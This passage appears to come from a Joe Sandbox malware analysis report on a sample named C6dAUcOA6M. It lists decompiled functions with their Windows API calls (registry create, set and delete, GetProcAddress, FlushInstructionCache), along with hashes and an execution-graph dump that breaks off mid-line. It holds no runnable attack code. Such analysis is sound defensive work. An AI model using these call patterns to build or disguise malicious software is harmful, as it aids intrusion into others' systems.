                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02CFC48B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0867e448f86ec9753e218d42b375bc144663fc286e4df0d64ddaf47578ad08a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: aeb014d65e0943bf258f6bf12a996be28fdf19eab3133e0e1912eb2e1e6a8da8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0867e448f86ec9753e218d42b375bc144663fc286e4df0d64ddaf47578ad08a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AD05EE0B4030A6AE7C4EFF194806313B9C8398310F104826EB0155600E7725A14CF14
                                                                                                                                                                                                                                                                                                                                                      Function 02CFE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CFE297
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CFE2B3
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CFE32A
                                                                                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 02CFE353
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 920484758-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 53c3ef733158b3ec2c291cc4f25d9c405f94c337afcfc554e38b643b0e984283
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22412975A012299FCBE2DB58CC94BC9B3BEAF48304F0041D5E64DA7221DA30AF849F94
                                                                                                                                                                                                                                                                                                                                                      Function 02CFAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98
                                                                                                                                                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3990497365-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1ca2de381ab223f366c3363218d6e667702318a6a1161a720136fb3b43c5d309
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 924ee3da6ad75c639216460b159d36220b57140d37d76bb66001de14a7eb3fbe
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ca2de381ab223f366c3363218d6e667702318a6a1161a720136fb3b43c5d309
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9413B71A402589BDBE1DB68CC84BDAB7FDAB48340F4441E6A648E7241EB749F84DF90
                                                                                                                                                                                                                                                                                                                                                      Function 02CFAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98
                                                                                                                                                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3990497365-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 376f0348fe90836928dd88bc4cf15aa112c9e6c5aac8e48a22066e17fb41d9be
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a07394182bb27a42a22cde4b1e50d5c918b45283fdce426f9b09f535dc67d49a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 376f0348fe90836928dd88bc4cf15aa112c9e6c5aac8e48a22066e17fb41d9be
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9414D71A402589BDBE1DB68CC84BDAB7FDAB48340F4441E6A748E7241EB749F84DF90
                                                                                                                                                                                                                                                                                                                                                      Function 02CF1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1a3aee59bb339cc15ffd2c0a5611125ad1a0fb4ef99f4675fb7154d342ab1a9b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0603ecc18c82405f2b97e2393ba52d536f166662de716f2b8990c4e30a7e120a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a3aee59bb339cc15ffd2c0a5611125ad1a0fb4ef99f4675fb7154d342ab1a9b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65A1F5777106008BD7D9AA7D9C843ADB3D29BC4225F1D423EE31DCB381EBE98A469650
                                                                                                                                                                                                                                                                                                                                                      Function 02CF94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02CF95DA), ref: 02CF9572
                                                                                                                                                                                                                                                                                                                                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02CF95DA), ref: 02CF9578
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                                                                                                                                                      • String ID: yyyy
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e3f00a4ef3420892305211019b92d1b17fe5d94f37fa02fc1136dbb47882da68
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7aeea3749359e840b538659bf435d348fa8ef9d2da19804006db52414b03ebdc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3f00a4ef3420892305211019b92d1b17fe5d94f37fa02fc1136dbb47882da68
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB216D71A042589FDFE4EFA8C881BAEB3B9EF49700F5101A6EA05E7250D7309F40DB65
                                                                                                                                                                                                                                                                                                                                                      Function 02D08338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D083C2), ref: 02D083A4
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                                                                                                                                                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3811539418-184458249
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a58f34a2a92fc5b5762dda2b2e014f7a57729b5f7c0326b4d614dbf80ab34fc0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b4e98af088740ea4d97628a6e1e527fd1ed8a5d0efb2fb89549398ba1ec71c35
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a58f34a2a92fc5b5762dda2b2e014f7a57729b5f7c0326b4d614dbf80ab34fc0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65016D71740304AFE794EFA4EC81F6B77AEEB48B00F514860BA04D6790D674AD14AB25
                                                                                                                                                                                                                                                                                                                                                      Function 02D0AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0AF58
                                                                                                                                                                                                                                                                                                                                                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 02D0AF88
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 02D0AFA7
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0AFB3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Read$Write
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3448952669-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 244b848b2e99074664aa410fe8a8193d8993e9ac72f28d1fab7151c0c94c21d4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85216AB264071A9BDB50DE69CDC0BAA7BA9EB80366F108511FE14973D0D774E811CAA0

                                                                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                                                                      Execution Coverage:4%
                                                                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                      Signature Coverage:0.6%
                                                                                                                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:11
                                                                                                                                                                                                                                                                                                                                                      execution_graph 22648 f068e0 22649 f068f1 22648->22649 22650 f068fc 22648->22650 22654 f05679 22649->22654 22652 f05679 458 API calls 22650->22652 22653 f068f6 22652->22653 22678 ef71a8 22654->22678 22656 f05685 RegOpenKeyExW 22657 f056bb 22656->22657 22667 f05775 22656->22667 22658 eebc30 448 API calls 22657->22658 22659 f056cd 22658->22659 22660 ef0060 5 API calls 22659->22660 22661 f056da 22659->22661 22662 f056ed 22660->22662 22679 f057a8 22661->22679 22664 eeacb0 448 API calls 22662->22664 22666 f056f4 22664->22666 22666->22661 22669 f05711 22666->22669 22672 f056e4 22666->22672 22667->22653 22668 f05716 22670 ee78e4 448 API calls 22668->22670 22669->22668 22671 ef0060 5 API calls 22669->22671 22670->22672 22673 f05737 22671->22673 22726 f05799 22672->22726 22674 eeacb0 448 API calls 22673->22674 22675 f0573e 22674->22675 22675->22668 22675->22672 22676 f05759 22675->22676 22704 f064db 22676->22704 22678->22656 22680 f058af 22679->22680 22685 f057d0 22679->22685 22682 eeab7f 2 API calls 22680->22682 22681 f057da RegEnumKeyExW 22683 f05892 22681->22683 22681->22685 22684 f058b6 22682->22684 22688 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22683->22688 22686 eeacb0 448 API calls 22684->22686 22685->22681 22685->22683 22691 f05885 GetLastError 22685->22691 22693 eedc60 2 API calls 22685->22693 22695 ee9950 448 API calls 22685->22695 22687 f058bd 22686->22687 22687->22683 22689 ef01f5 wcsrchr 22687->22689 22690 f05946 22688->22690 22694 f058cd 22689->22694 22690->22672 22692 ee78e4 448 API calls 22691->22692 22692->22683 22693->22685 22696 f05913 22694->22696 22700 f05903 22694->22700 22695->22685 22697 ee78e4 448 API calls 22696->22697 22698 f0590f 22697->22698 22699 eedc60 2 API calls 22698->22699 22701 f05930 22699->22701 22702 ee9950 448 API calls 22700->22702 22703 eedc60 2 API calls 22701->22703 22702->22698 22703->22683 22705 f064e7 22704->22705 22706 f0658c RegDeleteKeyExW 22705->22706 22708 f06502 RegCreateKeyExW 22705->22708 22707 f0659f RegOpenKeyExW 22706->22707 22713 f0656b 22706->22713 22711 f065cc RegDeleteValueW 22707->22711 22712 f065bc 22707->22712 22709 f06573 22708->22709 22714 f0651e 22708->22714 22716 ee78e4 448 API calls 22709->22716 22710 ef72ef ApiSetQueryApiSetPresence 22717 f06601 22710->22717 22711->22713 22715 f065e3 22711->22715 22712->22713 22718 ee78e4 448 API calls 22712->22718 22713->22710 22713->22717 22714->22714 22719 f06531 RegSetValueExW 22714->22719 22720 ee78e4 448 API calls 22715->22720 22721 f0657a 22716->22721 22717->22672 22718->22713 22723 f06559 22719->22723 22720->22713 22722 ee78e4 448 API calls 22721->22722 22722->22713 22723->22709 22724 f0655d 22723->22724 22725 ee9950 448 API calls 22724->22725 22725->22713 22727 eedc60 2 API calls 22726->22727 22728 f057a0 22727->22728 22729 eedc60 2 API calls 22728->22729 22730 f057a7 22729->22730 22730->22667 22584 ef6ec0 SetUnhandledExceptionFilter 25317 f06910 25318 f06921 25317->25318 25319 f0692c 25317->25319 25323 f05e03 25318->25323 25321 f05e03 457 API calls 25319->25321 25322 f06926 25321->25322 25345 ef71a8 25323->25345 25325 f05e0f RegOpenKeyExW 25326 f05e45 25325->25326 25336 f05ef8 25325->25336 25327 eebc30 448 API calls 25326->25327 25328 f05e57 25327->25328 25329 f05e64 25328->25329 25330 ef0060 5 API calls 25328->25330 25346 f05948 25329->25346 25332 f05e77 25330->25332 25333 eeacb0 448 API calls 25332->25333 25335 f05e7e 25333->25335 25335->25329 25339 f05e9b 25335->25339 25340 f05e6e 25335->25340 25336->25322 25337 f05ea0 25338 ee78e4 448 API calls 25337->25338 25338->25340 25339->25337 25341 eeacb0 448 API calls 25339->25341 25409 f05f1c 25340->25409 25342 f05ec1 25341->25342 25342->25337 25342->25340 25343 f05edc 25342->25343 25381 f06650 25343->25381 25345->25325 25347 f05af8 25346->25347 25366 f05970 25346->25366 25349 f05b16 25347->25349 25350 f05afe 25347->25350 25348 f05990 RegEnumKeyExW 25354 f05ae7 25348->25354 25348->25366 25351 eeab7f 2 API calls 25349->25351 25352 ee78e4 448 API calls 25350->25352 25353 f05b1d 25351->25353 25352->25354 25355 eeacb0 448 API calls 25353->25355 25357 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 25354->25357 25356 f05b24 25355->25356 25356->25354 25359 ef01f5 wcsrchr 25356->25359 25358 f05c52 25357->25358 25358->25340 25360 f05b3c 25359->25360 25362 f05b68 25360->25362 25368 f05b7f 25360->25368 25361 f05ae2 25363 ef6c78 4 API calls 25361->25363 25364 ee78e4 448 API calls 25362->25364 25363->25354 25367 f05b74 25364->25367 25365 eedc60 2 API calls 25365->25366 25366->25348 25366->25354 25366->25361 25366->25365 25366->25366 25371 ee9950 448 API calls 25366->25371 25370 eedc60 2 API calls 25367->25370 25369 f05b9e RegOpenKeyExW 25368->25369 25372 f05bc4 25369->25372 25375 f05bd6 25369->25375 25370->25354 25371->25366 25373 ee78e4 448 API calls 25372->25373 25373->25367 25374 f05c21 25376 ee78e4 448 API calls 25374->25376 25375->25374 25379 f05c13 25375->25379 25377 f05c1f 25376->25377 25378 eedc60 2 API calls 25377->25378 25378->25367 25380 ee9950 448 API calls 25379->25380 25380->25377 25382 f06680 25381->25382 25382->25382 25383 f0669b 25382->25383 25388 f066b0 25382->25388 25384 ee78e4 448 API calls 25383->25384 25396 f066a6 25384->25396 25385 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 25387 f068da 25385->25387 25386 f06729 RegOpenKeyExW 25389 f06831 25386->25389 25390 f06755 25386->25390 25387->25340 25388->25386 25392 f0689c RegDeleteValueW 25389->25392 25395 f0683c RegSetValueExW 25389->25395 25391 f0681c 25390->25391 25407 f06768 25390->25407 25393 ee78e4 448 API calls 25391->25393 25394 f068af 25392->25394 25392->25396 25393->25396 25397 ee78e4 448 API calls 25394->25397 25400 f06881 25395->25400 25401 f06873 25395->25401 25396->25385 25397->25396 25398 f067a4 RegCreateKeyExW 25402 f06801 25398->25402 25398->25407 25404 ee78e4 448 API calls 25400->25404 25403 ee9950 448 API calls 25401->25403 25405 ee78e4 448 API calls 25402->25405 25403->25396 25406 f0688a 25404->25406 25405->25396 25408 ee78e4 448 API calls 25406->25408 25407->25389 25407->25398 25408->25396 25410 eedc60 2 API calls 25409->25410 25411 f05f23 25410->25411 25412 eedc60 2 API calls 25411->25412 25413 f05f2a 25412->25413 25413->25336 18427 ef6903 18429 ef690f 18427->18429 18428 ef6934 18431 ef6953 _amsg_exit 18428->18431 18433 ef695d 18428->18433 18429->18428 18430 ef693b Sleep 18429->18430 18430->18429 18431->18433 18432 ef699f _initterm 18439 ef69ba __IsNonwritableInCurrentImage 18432->18439 18433->18432 18435 ef6980 18433->18435 18433->18439 18441 ef09b1 GetCurrentThreadId OpenThread 18439->18441 18500 eee2af 18441->18500 18443 ef09e8 HeapSetInformation RegOpenKeyExW 18444 ef0a18 18443->18444 18445 efe9c5 RegQueryValueExW 18443->18445 18510 ef1f5b 18444->18510 18448 efe9f0 18445->18448 18663 ee63bd 18448->18663 18450 ef0a41 18523 ee87ca 8 API calls 18450->18523 18458 efea58 _setjmp3 18460 efea6f 18458->18460 18461 efea82 18458->18461 18459 efea08 18475 ef0a87 18459->18475 18678 ef1e70 18459->18678 18460->18461 18464 efea73 18460->18464 18463 efeaa4 